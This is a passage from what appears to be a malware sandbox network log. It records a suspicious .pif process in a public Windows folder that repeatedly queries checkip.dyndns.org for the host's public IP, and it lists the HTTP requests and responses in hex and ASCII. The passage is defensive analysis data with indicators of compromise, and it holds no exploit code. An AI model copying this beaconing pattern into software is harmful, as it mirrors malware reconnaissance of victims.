Jan 7, 2025 13:25:30.119915009 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49831	132.226.8.169	80	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:23.953386068 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 7, 2025 13:25:25.551780939 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49848	132.226.8.169	80	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:26.286412954 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 7, 2025 13:25:27.100621939 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49860	132.226.8.169	80	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:27.800944090 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:28.585275888 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49872	132.226.8.169	80	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:28.998550892 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:29.819106102 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 7, 2025 13:25:29.822537899 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 7, 2025 13:25:30.084480047 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 7, 2025 13:25:30.299998045 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 7, 2025 13:25:31.202631950 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 7, 2025 13:25:31.475732088 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49873	132.226.8.169	80	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:29.308279037 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:30.078886032 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49886	132.226.8.169	80	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:30.517153978 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 7, 2025 13:25:31.304066896 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49889	132.226.8.169	80	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:30.702820063 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:31.497011900 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49901	132.226.8.169	80	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:31.952028036 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:33.304622889 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49904	132.226.8.169	80	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:32.108401060 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 7, 2025 13:25:33.526985884 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49905	132.226.8.169	80	6396	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:32.123080969 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:33.432992935 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49919	132.226.8.169	80	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:33.935595989 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:34.711153030 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49921	132.226.8.169	80	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:34.156344891 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:34.988179922 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49932	132.226.8.169	80	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:35.325990915 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:36.139569998 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49934	132.226.8.169	80	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:35.597207069 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:36.378267050 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49946	132.226.8.169	80	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:36.956527948 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:37.751904011 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49947	132.226.8.169	80	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:37.102123976 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:37.882294893 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49960	132.226.8.169	80	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:38.406665087 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:39.287688017 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49961	132.226.8.169	80	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:38.607492924 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:39.533214092 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49974	132.226.8.169	80	2228	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:39.909090996 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:40.722276926 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49975	132.226.8.169	80	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:40.169658899 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 7, 2025 13:25:40.973520041 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 12:25:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49990	132.226.8.169	80	5476	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:25:41.592750072 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
